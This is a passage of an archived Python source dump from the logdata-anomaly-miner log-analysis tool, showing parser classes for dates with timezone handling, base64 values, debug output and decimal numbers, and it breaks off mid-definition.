re.compile(b"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?") def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes forming an integer number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found. """ match = self.regex.match(match_context.match_data) if match is None or match.span()[1] == 0: return None match_len = match.span()[1] match_string = match_context.match_data[:match_len] match_context.update(match_string) try: match_value = base64.b64decode(match_string) # we need to check if no exception is raised when decoding the original string. match_value.decode(AminerConfig.ENCODING) except UnicodeDecodeError: match_value = match_string return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DateTimeModelElement.py000066400000000000000000001011451437606560100351360ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module contains a datetime parser and helper classes for parsing. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import time import logging import locale from typing import Union, List, Set from datetime import timezone, datetime from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement timezone_info = { "A": 1 * 3600, "ACDT": 10.5 * 3600, "ACST": 9.5 * 3600, "ACT": -5 * 3600, "ACWST": 8.75 * 3600, "ADT": 4 * 3600, "AEDT": 11 * 3600, "AEST": 10 * 3600, "AET": 10 * 3600, "AFT": 4.5 * 3600, "AKDT": -8 * 3600, "AKST": -9 * 3600, "ALMT": 6 * 3600, "AMST": -3 * 3600, "AMT": -4 * 3600, "ANAST": 12 * 3600, "ANAT": 12 * 3600, "AQTT": 5 * 3600, "ART": -3 * 3600, "AST": 3 * 3600, "AT": -4 * 3600, "AWDT": 9 * 3600, "AWST": 8 * 3600, "AZOST": 0 * 3600, "AZOT": -1 * 3600, "AZST": 5 * 3600, "AZT": 4 * 3600, "AoE": -12 * 3600, "B": 2 * 3600, "BNT": 8 * 3600, "BOT": -4 * 3600, "BRST": -2 * 3600, "BRT": -3 * 3600, "BST": 6 * 3600, "BTT": 6 * 3600, "C": 3 * 3600, "CAST": 8 * 3600, "CAT": 2 * 3600, "CCT": 6.5 * 3600, "CDT": -5 * 3600, "CEST": 2 * 3600, "CET": 1 * 3600, "CHADT": 13.75 * 3600, "CHAST": 12.75 * 3600, "CHOST": 9 * 3600, "CHOT": 8 * 3600, "CHUT": 10 * 3600, "CIDST": -4 * 3600, "CIST": -5 * 3600, "CKT": -10 * 3600, "CLST": -3 * 3600, "CLT": -4 * 3600, "COT": -5 * 3600, "CST": -6 * 3600, "CT": -6 * 3600, "CVT": -1 * 3600, "CXT": 7 * 3600, "ChST": 10 * 3600, "D": 4 * 3600, "DAVT": 7 * 3600, "DDUT": 10 * 3600, "E": 5 * 3600, "EASST": -5 * 3600, "EAST": -6 * 3600, "EAT": 3 * 3600, "ECT": -5 * 3600, "EDT": -4 * 3600, "EEST": 3 * 3600, "EET": 2 * 3600, "EGST": 0 * 3600, "EGT": -1 * 3600, "EST": -5 * 3600, "ET": -5 * 3600, "F": 6 * 3600, "FET": 3 * 3600, "FJST": 13 * 3600, "FJT": 12 * 3600, "FKST": -3 * 3600, "FKT": -4 * 3600, "FNT": -2 * 3600, "G": 7 * 3600, "GALT": -6 * 3600, "GAMT": -9 * 3600, "GET": 4 * 3600, "GFT": -3 * 3600, "GILT": 12 * 3600, "GMT": 0 * 3600, "GST": 4 * 3600, "GYT": -4 * 3600, "H": 8 * 3600, "HDT": -9 * 3600, "HKT": 8 * 3600, "HOVST": 8 * 3600, "HOVT": 7 * 3600, "HST": -10 * 3600, "I": 9 * 3600, "ICT": 7 * 3600, "IDT": 3 * 3600, "IOT": 6 * 3600, "IRDT": 4.5 * 3600, "IRKST": 9 * 3600, "IRKT": 8 * 3600, "IRST": 3.5 * 3600, "IST": 5.5 * 3600, "JST": 9 * 3600, "K": 10 * 3600, "KGT": 6 * 3600, "KOST": 11 * 3600, "KRAST": 8 * 3600, "KRAT": 7 * 3600, "KST": 9 * 3600, "KUYT": 4 * 3600, "L": 11 * 3600, "LHDT": 11 * 3600, "LHST": 10.5 * 3600, "LINT": 14 * 3600, "M": 12 * 3600, "MAGST": 12 * 3600, "MAGT": 11 * 3600, "MART": 9.5 * 3600, "MAWT": 5 * 3600, "MDT": -6 * 3600, "MHT": 12 * 3600, "MMT": 6.5 * 3600, "MSD": 4 * 3600, "MSK": 3 * 3600, "MST": -7 * 3600, "MT": -7 * 3600, "MUT": 4 * 3600, "MVT": 5 * 3600, "MYT": 8 * 3600, "N": -1 * 3600, "NCT": 11 * 3600, "NDT": 2.5 * 3600, "NFT": 11 * 3600, "NOVST": 7 * 3600, "NOVT": 7 * 3600, "NPT": 5.5 * 3600, "NRT": 12 * 3600, "NST": 3.5 * 3600, "NUT": -11 * 3600, "NZDT": 13 * 3600, "NZST": 12 * 3600, "O": -2 * 3600, "OMSST": 7 * 3600, "OMST": 6 * 3600, "ORAT": 5 * 3600, "P": -3 * 3600, "PDT": -7 * 3600, "PET": -5 * 3600, "PETST": 12 * 3600, "PETT": 12 * 3600, "PGT": 10 * 3600, "PHOT": 13 * 3600, "PHT": 8 * 3600, "PKT": 5 * 3600, "PMDT": -2 * 3600, "PMST": -3 * 3600, "PONT": 11 * 3600, "PST": -8 * 3600, "PT": -8 * 3600, "PWT": 9 * 3600, "PYST": -3 * 3600, "PYT": -4 * 3600, "Q": -4 * 3600, "QYZT": 6 * 3600, "R": -5 * 3600, "RET": 4 * 3600, "ROTT": -3 * 3600, "S": -6 * 3600, "SAKT": 11 * 3600, "SAMT": 4 * 3600, "SAST": 2 * 3600, "SBT": 11 * 3600, "SCT": 4 * 3600, "SGT": 8 * 3600, "SRET": 11 * 3600, "SRT": -3 * 3600, "SST": -11 * 3600, "SYOT": 3 * 3600, "T": -7 * 3600, "TAHT": -10 * 3600, "TFT": 5 * 3600, "TJT": 5 * 3600, "TKT": 13 * 3600, "TLT": 9 * 3600, "TMT": 5 * 3600, "TOST": 14 * 3600, "TOT": 13 * 3600, "TRT": 3 * 3600, "TVT": 12 * 3600, "U": -8 * 3600, "ULAST": 9 * 3600, "ULAT": 8 * 3600, "UTC": 0 * 3600, "UYST": -2 * 3600, "UYT": -3 * 3600, "UZT": 5 * 3600, "V": -9 * 3600, "VET": -4 * 3600, "VLAST": 11 * 3600, "VLAT": 10 * 3600, "VOST": 6 * 3600, "VUT": 11 * 3600, "W": -10 * 3600, "WAKT": 12 * 3600, "WARST": -3 * 3600, "WAST": 2 * 3600, "WAT": 1 * 3600, "WEST": 1 * 3600, "WET": 0 * 3600, "WFT": 12 * 3600, "WGST": -2 * 3600, "WGT": -3 * 3600, "WIB": 7 * 3600, "WIT": 9 * 3600, "WITA": 8 * 3600, "WST": 14 * 3600, "WT": 0 * 3600, "X": -11 * 3600, "Y": -12 * 3600, "YAKST": 10 * 3600, "YAKT": 9 * 3600, "YAPT": 10 * 3600, "YEKST": 6 * 3600, "YEKT": 5 * 3600, "Z": 0 * 3600} search_tz_dict = {} keys = list(timezone_info.keys()) keys.sort() for idx in range(65, 91): search_tz_dict[idx] = [x.encode() for x in keys if x.encode()[0] == idx] search_tz_dict[idx].sort(key=len, reverse=True) # sorts by descending length class DateTimeModelElement(ModelElementInterface): """ This class defines a model element to parse date or datetime values. The element is similar to the strptime function but does not use it due to the numerous problems associated with it, e.g. no leap year support for semiqualified years, no %s (seconds since epoch) format in Python strptime, no %f support in libc strptime, no support to determine the length of the parsed string. """ # skipcq: PYL-W0613 def __init__(self, element_id: str, date_format: bytes, time_zone: timezone = None, text_locale: Union[str, tuple] = None, start_year: int = None, max_time_jump_seconds: int = 86400, timestamp_scale: int = 1): """ Create a DateTimeModelElement to parse dates using a custom, timezone and locale-aware implementation similar to strptime. @param element_id an identifier for the ModelElement which is shown in the path. @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for available formats. Supported format specifiers are: * %b: month name in current locale * %d: day in month, can be space or zero padded when followed by separator or at end of string. * %f: fraction of seconds (the digits after the the ".") * %H: hours from 00 to 23 * %M: minutes * %m: two digit month number * %S: seconds * %s: seconds since the epoch (1970-01-01) * %Y: 4 digit year number * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically. Common formats are: * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43" * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00" * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456" * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC" * "%d.%m.%Y" e.g. for "07.02.2019" * "%H:%M:%S" e.g. for "11:40:23" @param time_zone the timezone for parsing the values or UTC when None. @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a tuple of (locale, encoding) or a string. @param start_year when parsing date records without any year information, assume this is the year of the first value parsed. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc. """ self.text_locale = text_locale super().__init__(element_id, date_format=date_format, time_zone=time_zone, text_locale=text_locale, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds, timestamp_scale=timestamp_scale) if time_zone is None: self.time_zone = timezone.utc # Make sure that date_format is valid and extract the relevant parts from it. self.format_has_year_flag = False self.format_has_tz_specifier = False self.date_format_parts: Union[List[Union[bytes, tuple]]] = [] self.scan_date_format(date_format) if (not self.format_has_year_flag) and (start_year is None): self.start_year = time.gmtime(None).tm_year elif start_year is None: # this is needed so start_year is at any point an integer. (instead of being None) self.start_year = 0 self.last_parsed_seconds = 0 self.epoch_start_time = datetime.fromtimestamp(0, self.time_zone) def scan_date_format(self, date_format: bytes): """Scan the date format.""" if len(self.date_format_parts) > 0: msg = "Cannot rescan date format after initialization" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) date_format_parts: List[Union[bytes, tuple]] = [] date_format_type_set: Set[int] = set() scan_pos = 0 while scan_pos < len(date_format): next_param_pos = date_format.find(b"%", scan_pos) if next_param_pos < 0: next_param_pos = len(date_format) new_element: Union[bytes, tuple, None] = None if next_param_pos != scan_pos: new_element = date_format[scan_pos:next_param_pos] else: param_type_code = date_format[next_param_pos + 1:next_param_pos + 2] next_param_pos = scan_pos + 2 if param_type_code == b"%": new_element = b"%" elif param_type_code == b"b": import calendar name_dict = {} for month_pos in range(1, 13): name_dict[calendar.month_name[month_pos][:3].encode()] = month_pos new_element = (1, 3, name_dict) elif param_type_code == b"d": new_element = (2, 2, int) elif param_type_code == b"f": new_element = (6, -1, DateTimeModelElement.parse_fraction) elif param_type_code == b"H": new_element = (3, 2, int) elif param_type_code == b"M": new_element = (4, 2, int) elif param_type_code == b"m": new_element = (1, 2, int) elif param_type_code == b"S": new_element = (5, 2, int) elif param_type_code == b"s": new_element = (7, -1, int) elif param_type_code == b"Y": self.format_has_year_flag = True new_element = (0, 4, int) elif param_type_code == b"z": self.format_has_tz_specifier = True scan_pos = next_param_pos continue else: msg = f"Unknown dateformat specifier {repr(param_type_code)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(new_element, bytes): if date_format_parts and (isinstance(date_format_parts[-1], bytes)): date_format_parts[-1] += new_element else: date_format_parts.append(new_element) else: if new_element[0] in date_format_type_set: msg = f"Multiple format specifiers for type {new_element[0]}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) date_format_type_set.add(new_element[0]) date_format_parts.append(new_element) scan_pos = next_param_pos if (7 in date_format_type_set) and (not date_format_type_set.isdisjoint(set(range(0, 6)))): msg = "Cannot use %s (seconds since epoch) with other non-second format types" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_format_parts = date_format_parts def get_match_element(self, path: str, match_context): """ Try to find a match on given data for this model element and all its children. When a match is found, the match_context is updated accordingly. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return None when there is no match, MatchElement otherwise. The match_object returned is a tuple containing the datetime object and the seconds since 1970. """ parse_pos = 0 # Year, month, day, hour, minute, second, fraction, gmt-seconds: result: List = [0, 0, 0, 0, 0, 0, 0, 0] for part_pos, date_format_part in enumerate(self.date_format_parts): if isinstance(date_format_part, bytes): if not match_context.match_data[parse_pos:].startswith(date_format_part): return None parse_pos += len(date_format_part) continue next_length = date_format_part[1] next_data = None if next_length < 0: # No length given: this is only valid for integer fields or fields followed by a separator string. if (part_pos + 1) < len(self.date_format_parts): next_part = self.date_format_parts[part_pos + 1] if isinstance(next_part, bytes): end_pos = match_context.match_data.find(next_part, parse_pos) if end_pos < 0: return None next_length = end_pos - parse_pos if next_length < 0: # No separator, so get the number of decimal digits. next_length = 0 for digit_ord in match_context.match_data[parse_pos:]: if (digit_ord < 0x30) or (digit_ord > 0x39): break next_length += 1 if next_length == 0: return None next_data = match_context.match_data[parse_pos:parse_pos + next_length] else: next_data = match_context.match_data[parse_pos:parse_pos + next_length] if len(next_data) != next_length: return None parse_pos += next_length transform_function = date_format_part[2] if isinstance(transform_function, dict): value = None try: value = transform_function.get(next_data, None) except ValueError: pass if value is None: return None result[date_format_part[0]] = value else: try: result[date_format_part[0]] = transform_function(next_data) except ValueError: # Parsing failed, most likely due to wrong format. return None date_str = match_context.match_data[:parse_pos] result[7] /= self.timestamp_scale # Now combine the values and build the final value. parsed_date_time = None total_seconds = result[7] if total_seconds != 0: # skipcq: PTC-W0048 total_seconds += result[6] # For epoch second formats, the datetime value usually is not important. So stay with parsed_date_time to none. else: if not self.format_has_year_flag: result[0] = self.start_year microseconds = int(result[6] * 1000000) try: if 0 in (result[0], result[1], result[2]): current_date = datetime.now() if result[0] == 0: result[0] = current_date.year if result[1] == 0: result[1] = current_date.month if result[2] == 0: result[2] = current_date.day parsed_date_time = datetime(result[0], result[1], result[2], result[3], result[4], result[5], microseconds, self.time_zone) except ValueError: # The values did not form a valid datetime object, e.g. when the day of month is out of range. The rare case where dates # without year are parsed and the last parsed timestamp was from the previous non-leap year but the current timestamp is it, # is ignored. Values that sparse and without a year number are very likely to result in invalid data anyway. return None # Avoid timedelta.total_seconds(), not supported in Python 2.6. delta = parsed_date_time - self.epoch_start_time total_seconds = (delta.days * 86400 + delta.seconds) # See if this is change from one year to next. if not self.format_has_year_flag: if self.last_parsed_seconds == 0: # There cannot be a wraparound if we do not know any previous time values yet. self.last_parsed_seconds = total_seconds else: delta_seconds = self.last_parsed_seconds - total_seconds if abs(delta_seconds) <= self.max_time_jump_seconds: self.last_parsed_seconds = total_seconds else: # This might be the first date value for the next year or one from the previous. # Test both cases and see, what is more likely. date_error = False try: next_year_date_time = parsed_date_time.replace(self.start_year + 1) delta = next_year_date_time - self.epoch_start_time next_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and next_year_total_seconds - self.last_parsed_seconds <= self.max_time_jump_seconds: self.start_year += 1 parsed_date_time = next_year_date_time total_seconds = next_year_total_seconds self.last_parsed_seconds = total_seconds msg = f"DateTimeModelElement unqualified timestamp year wraparound detected from " \ f"{datetime.fromtimestamp(self.last_parsed_seconds, self.time_zone).isoformat()} to " \ f"{parsed_date_time.isoformat()}" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) else: try: last_year_date_time = parsed_date_time.replace(self.start_year - 1) delta = last_year_date_time - self.epoch_start_time last_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and self.last_parsed_seconds - last_year_total_seconds <= self.max_time_jump_seconds: parsed_date_time = last_year_date_time total_seconds = last_year_total_seconds self.last_parsed_seconds = total_seconds else: # None of both seems correct, just report that. msg = f"DateTimeModelElement time inconsistencies parsing {repr(date_str)}, expecting value around " \ f"{self.last_parsed_seconds}. Check your settings!" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) # We discarded the parsed_date_time microseconds beforehand, use the full float value here instead of the rounded integer. if result[6] is not None: total_seconds += result[6] if self.format_has_tz_specifier: valid_tz_specifier = True offset_allowed = True tz_specifier_offset = 0. if match_context.match_data[parse_pos] == ord(b" "): parse_pos += 1 resulting_key = None # only if the next character is in A-Z, a valid resulting_key can exist. if match_context.match_data[parse_pos] in search_tz_dict: # search the first fitting resulting_key in the sorted tz_dict and break the loop. for key in search_tz_dict[match_context.match_data[parse_pos]]: if match_context.match_data[parse_pos:].startswith(key): resulting_key = key break # an offset is only allowed with UTC and GMT. if resulting_key not in (b"UTC", b"GMT"): offset_allowed = False if resulting_key is not None: # get the offset from the timezone_info dict. tz_specifier_offset = timezone_info[resulting_key.decode()] parse_pos += len(resulting_key) if match_context.match_data[parse_pos] in (ord(b"+"), ord(b"-")) and offset_allowed and valid_tz_specifier: sign = -1 if match_context.match_data[parse_pos] == ord(b"+"): sign = 1 parse_pos += 1 cnt_digits = 0 colon_shift = 0 # parse data as long as there is more data. while parse_pos < len(match_context.match_data): # shift the position and count to the next position, if the current character is a digit. if chr(match_context.match_data[parse_pos]).isdigit(): cnt_digits += 1 parse_pos += 1 # if the current character is no digit and cnt_digits is 2, a colon is allowed. elif cnt_digits == 2 and match_context.match_data[parse_pos] == ord(b":"): parse_pos += 1 colon_shift = 1 else: break # if the digit count is not 4 and a colon is found, then no colon shift should be applied. This could be the case, if a # colon follows the date (02.11.2021 UTC+01: some text) if cnt_digits != 4 and colon_shift == 1: parse_pos -= 1 colon_shift = 0 # if the digits count is zero or bigger than 4, then the specifier is not valid. if cnt_digits == 0 or cnt_digits > 4: valid_tz_specifier = False else: # only one hour position was found. if cnt_digits == 1: tz_specifier_offset = sign * int(chr(match_context.match_data[parse_pos-1])) * 3600 # two hours specifiers were found. elif cnt_digits == 2: tz_specifier_offset = sign * int(match_context.match_data[parse_pos-2:parse_pos].decode()) * 3600 # four time specifiers were found with an optional colon. elif cnt_digits == 4: tz_specifier_offset = sign * int(match_context.match_data[parse_pos-4-colon_shift:parse_pos-2-colon_shift]) * \ 3600 + int(match_context.match_data[parse_pos-2:parse_pos] * 60) if valid_tz_specifier: date_str = match_context.match_data[:parse_pos] # the offset must be subtracted, because the timestamp should always be UTC. total_seconds -= tz_specifier_offset match_context.update(date_str) return MatchElement(f"{path}/{self.element_id}", date_str, total_seconds, None) @staticmethod def parse_fraction(value_str: bytes): """Pass this method as function pointer to the parsing logic.""" return float(b"0." + value_str) class MultiLocaleDateTimeModelElement(ModelElementInterface): """ This class defines a model element to parse date or datetime values from log sources. The date or datetime can contain timestamps encoded in different locales or on machines, where host/service locale does not match data locale(s). CAVEAT: Unlike other model elements, this element is not completely stateless! As parsing of semi qualified date values without any year information may produce wrong results, e.g. wrong year or 1 day off due to incorrect leap year handling, this object will keep track of the most recent timestamp parsed and will use it to regain information about the year in semi qualified date values. Still this element will not complain when parsed timestamp values are not strictly sorted, this should be done by filtering modules later on. The sorting requirements here are only, that each new timestamp value may not be more than 2 days before and 1 month after the most recent one observer. Internal operation: * When creating the object, make sure that there are no ambiguous dateFormats in the list, e.g. one with "day month" and another one with "month day". * To avoid decoding of binary input data in all locales before searching for e.g. month names, convert all possible month names to bytes during object creation and just keep the lookup list. """ def __init__(self, element_id: str, date_formats: list, start_year: int = None, max_time_jump_seconds: int = 86400): """ Create a new MultiLocaleDateTimeModelElement object. @param element_id an identifier for the ModelElement which is shown in the path. @param date_formats this parameter is a list of tuples, each tuple containing information about one date format to support. The tuple structure is (format_string, format_timezone, format_locale). The format_string may contain the same elements as supported by strptime from datetime.datetime. The format_locale defines the locale for the string content, e.g. de_DE for german, but also the data IO encoding, e.g. ISO-8859-1. The locale information has to be available, e.g. using "locale-gen" on Debian systems. The format_timezone can be used to define the timezone of the timestamp parsed. When None, UTC is used. The timezone support may only be sufficient for very simple use-cases, e.g. all data from one source configured to create timestamps in that timezone. @param start_year when given, parsing will use this year value for semi qualified timestamps to add correct year information. This is especially relevant for historic datasets as otherwise leap year handling may fail. The startYear parameter will only take effect when the first timestamp to be parsed by this object is also semi qualified. Otherwise, the year information is extracted from this record. When empty and first parsing invocation involves a semi qualified date, the current year in UTC timezone is used. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. """ super().__init__(element_id, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) if len(date_formats) == 0: msg = "At least one date_format must be specified." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) format_has_year_flag = False default_locale = locale.getdefaultlocale() self.date_time_model_elements: List[DateTimeModelElement] = [] for i, date_format in enumerate(date_formats): if not isinstance(date_format, tuple): msg = "date_format must be of type tuple." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(date_format) != 3: msg = "date_format consist of 3 elements." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) date_format, time_zone, text_locale = date_format if isinstance(text_locale, str) and len(text_locale) < 1: msg = "empty text_locale is not allowed." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for date_time_model_element in self.date_time_model_elements: if date_format.startswith(date_time_model_element.date_format): msg = f"Invalid order of date_formats. {date_format.decode()} starts with " \ f"{date_time_model_element.date_format.decode()}. More specific datetimes would be skipped." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_time_model_elements.append(DateTimeModelElement( element_id + "/format" + str(i), date_format, time_zone, text_locale, start_year, max_time_jump_seconds)) format_has_year_flag = format_has_year_flag and self.date_time_model_elements[-1].format_has_year_flag # The latest parsed timestamp value. self.latest_parsed_timestamp = None # Restore previous locale settings. There seems to be no way in python to get back to the exact same state. Hence perform the # reset only when locale has changed. This would also change the locale from (None, None) to some system-dependent locale. if locale.getlocale() != default_locale: locale.resetlocale() if (not format_has_year_flag) and (start_year is None): self.start_year = time.gmtime(None).tm_year elif start_year is None: # this is needed so start_year is at any point an integer. (instead of being None) self.start_year = 0 self.last_parsed_seconds = 0 def get_match_element(self, path: str, match_context): """ Check if the data to match within the content is suitable to be parsed by any of the supplied date formats. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return On match return a match_object containing a tuple of the datetime object and the seconds since 1970. When not matching, None is returned. When the timestamp data parsed would be far off from the last ones parsed, so that correction may not be applied correctly, then the method will also return None. """ for i, date_time_model_element in enumerate(self.date_time_model_elements): locale.setlocale(locale.LC_ALL, date_time_model_element.text_locale) self.date_time_model_elements[i].last_parsed_seconds = self.last_parsed_seconds self.date_time_model_elements[i].start_year = self.start_year match_element = date_time_model_element.get_match_element(path, match_context) if match_element is not None: self.last_parsed_seconds = date_time_model_element.last_parsed_seconds self.start_year = date_time_model_element.start_year return match_element return None DebugModelElement.py000066400000000000000000000045331437606560100344730ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a debug model element that can be used to check whether a specific position in the parsing tree is reached by log atoms. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class DebugModelElement(ModelElementInterface): """ This class defines a model element matching any data of length zero at any position. Thus, it can never fail to match and can be inserted at any position in the parsing tree, where matching itself does not alter parsing flow (see e.g. FirstMatchModelElement). It will immediately write the current state of the match to stderr for inspection. """ def __init__(self, element_id: str): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. """ super().__init__(element_id) # To avoid having those elements hidden in production configuration, write a line every time the class is instantiated. msg = f"DebugModelElement {element_id} added" logging.getLogger(DEBUG_LOG_NAME).info(msg) print(msg, file=sys.stderr) def get_match_element(self, path: str, match_context): """ @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return Always return a match. """ msg = f'DebugModelElement path = "{path}/{self.element_id}", unmatched = "{repr(match_context.match_data)}"' logging.getLogger(DEBUG_LOG_NAME).info(msg) print(msg, file=sys.stderr) return MatchElement(f"{path}/{self.element_id}", b"", b"", None) DecimalFloatValueModelElement.py000066400000000000000000000130131437606560100367570ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines an model element for decimal number parsing as float. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class DecimalFloatValueModelElement(ModelElementInterface): """ This class defines a model to parse decimal values with optional signum, padding or exponent. With padding, the signum has to be found before the padding characters. """ SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" EXP_TYPE_NONE = "none" EXP_TYPE_OPTIONAL = "optional" EXP_TYPE_MANDATORY = "mandatory" def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE, exponent_type: str = EXP_TYPE_NONE): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed, EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values. """ super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type, exponent_type=exponent_type) self.digits = set(b"0123456789") def get_match_element(self, path: str, match_context): """ Find the maximum number of bytes forming a decimal number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found """ data = match_context.match_data if not data or (data[0] not in self.start_characters): return None match_len = 1 if self.pad_characters == b"" and data.startswith(b"0") and not data.startswith(b"0.") and len(data) > 1 and \ data[1] in self.digits: return None for test_byte in data[match_len:]: if test_byte not in self.pad_characters: break match_len += 1 num_start_pos = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == 1: # skipcq: PTC-W0048 if data[0] not in self.digits: return None elif num_start_pos == match_len and match_len == 1: # only return None if match_len is 1 to allow 00 with zero padding. return None # See if there is decimal part after decimal point. if (match_len < len(data)) and (chr(data[match_len]) == "."): match_len += 1 post_point_start = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == post_point_start - 1: # There has to be at least one digit after the decimal point. return None # See if there could be any exponent following the number. if (self.exponent_type != DecimalFloatValueModelElement.EXP_TYPE_NONE) and (match_len + 1 < len(data)) and ( data[match_len] in b"eE"): match_len += 1 if data[match_len] in b"+-": match_len += 1 exp_number_start = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == exp_number_start: # No exponent number found. return None elif self.exponent_type == DecimalFloatValueModelElement.EXP_TYPE_MANDATORY: return None match_string = data[:match_len] if self.pad_characters == b" " and match_string[0] in b"+-": if b" " in match_string.replace(b" ", b"", 1): return None match_value = float(match_string.replace(b" ", b"", 1)) else: match_value = float(match_string) match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DecimalIntegerValueModelElement.py000066400000000000000000000111631437606560100373130ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines an model element for integer number parsing. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class DecimalIntegerValueModelElement(ModelElementInterface): """ This class defines a model to parse integer values with optional signum or padding. If both are present, it is signum has to be before the padding characters. """ SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" def __init__(self, 